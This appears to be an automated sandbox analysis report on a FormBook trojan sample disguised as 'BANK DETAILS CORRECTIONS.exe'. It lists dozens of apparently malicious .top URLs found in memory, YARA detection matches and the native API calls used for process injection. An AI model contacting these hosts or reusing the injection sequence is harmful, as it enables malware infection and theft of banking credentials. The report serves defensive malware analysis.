                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://auvq.gta6p.top/qjeml6z/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://bah.laoli666.top/ok8x/ttbj2.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://bzem8k.8kb9n.top/umcbim/nf2.xlsx
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cj4x.fehs5.top/n93ovfl/
                Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crash-reports.mozilla.com/submit?id=
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://crs7b73.7q14w.top/hgwuscj/1z8.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://d17ced.6imvv.top/nutmwu9/mie.docx
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://eocmn.1osh5.top/lnyp0/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000004E54000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.0000000003314000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.1678819891.000000002FE94000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://error.kangleweb.net/?code=404&vh=vhsa57698
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gx66ij.em9p9.top/9brce/tw1w.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://h8w.soaw8.top/mthsy3w/eonaph.doc
                Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hxb.1cva0.top/hnz76/
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/#website
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/?s=
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-180x180.jpg
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-192x192.jpg
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-270x270.jpg
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-32x32.jpg
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/wp-json/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://hzw.avt.temporary.site/xmlrpc.php?rsd
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ijg.oc7o0.top/7a85xk/ua98sk.htm
                Source: sdiagnhost.exe, 00000015.00000003.1678729235.0000000007E26000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kaw.rz93l.top/i9i5z0v/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kfpuh5.qclxx.top/v3d9st8/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kpl507.bdx91.top/wd1/
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033U
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: sdiagnhost.exe, 00000015.00000002.3732172786.00000000026A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: sdiagnhost.exe, 00000015.00000003.1620843904.00000000074E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.4.3
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://n6x7o74.9vjyq.top/81v/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nrbh.gm2mv.top/oc5p/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nyzn27r.8k4z2.top/fkh8x/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nzh.6imvv.top/lbh/0lr90nc.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://o93nkcu.qk5qf.top/e1drt6/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://oha9lk4.7xy0c.top/y96u/
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-4923976505653650
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://q5cjh4.7fwhx.top/wd5qx9/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ranj.huwd6.top/yh2za/hgvjh3.htm
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://schema.org
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://sl3gr8c.77bdh.top/qlfc/nbf1.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://so6k0.y4mlv.top/pk2efa4/6s8v.html
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.0000000005E08000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.00000000042C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://themegrill.com/themes/flash/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ua01qg.jsj91.top/b8pu1ee/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ucu1rd5.k831s.top/4t0pwdl/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://usqzg3b.s0kfn.top/q7gyjwg/roc.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://v94nhnh.kwx2l.top/e94/ropif.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://vgm.3i47j.top/3f1d/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wjf.g3vqd.top/9qsld/
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sdiagnhost.exe, 00000015.00000003.1624945463.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://xajg3.mmdb8.top/ji0/b0kf5r.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zbgzs.5pych.top/zic/qxk3gc.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zmcd3i.7m9y3.top/f3b/iv0u2y.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zqjt96.8kb9n.top/nilm9fi/81afsn7.htm
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zspo.sf3l2.top/0ie1ye/vlc52d.htm

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 12.2.BANK DETAILS CORRECTIONS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.3734033514.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000C.00000002.1415956033.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000019.00000002.3736975919.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000C.00000002.1418327028.0000000001860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.3731748977.0000000002320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000018.00000002.1517319906.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000015.00000002.3733947362.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000014.00000002.1513647922.00000000019A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000011.00000002.3733999861.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000016.00000002.3734431266.0000000002C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000C.00000002.1420663413.0000000002880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Windows\SysWOW64\sdiagnhost.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040B043 NtCreateSection,12_2_0040B043
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040A803 NtGetContextThread,12_2_0040A803
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040B263 NtMapViewOfSection,12_2_0040B263
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040AA13 NtSetContextThread,12_2_0040AA13
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040BB33 NtDelayExecution,12_2_0040BB33
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0042BBF3 NtClose,12_2_0042BBF3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040AC23 NtResumeThread,12_2_0040AC23
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040B493 NtCreateFile,12_2_0040B493
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040A5F3 NtSuspendThread,12_2_0040A5F3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040B6C3 NtReadFile,12_2_0040B6C3
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0040BF53 NtAllocateVirtualMemory,12_2_0040BF53
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962B60 NtClose,LdrInitializeThunk,12_2_01962B60
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_01962DF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_01962C70
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019635C0 NtCreateMutant,LdrInitializeThunk,12_2_019635C0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01964340 NtSetContextThread,12_2_01964340
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01964650 NtSuspendThread,12_2_01964650
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962B80 NtQueryInformationFile,12_2_01962B80
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962BA0 NtEnumerateValueKey,12_2_01962BA0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962BF0 NtAllocateVirtualMemory,12_2_01962BF0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962BE0 NtQueryValueKey,12_2_01962BE0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962AB0 NtWaitForSingleObject,12_2_01962AB0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_01962AD0 NtReadFile,12_2_01962AD0
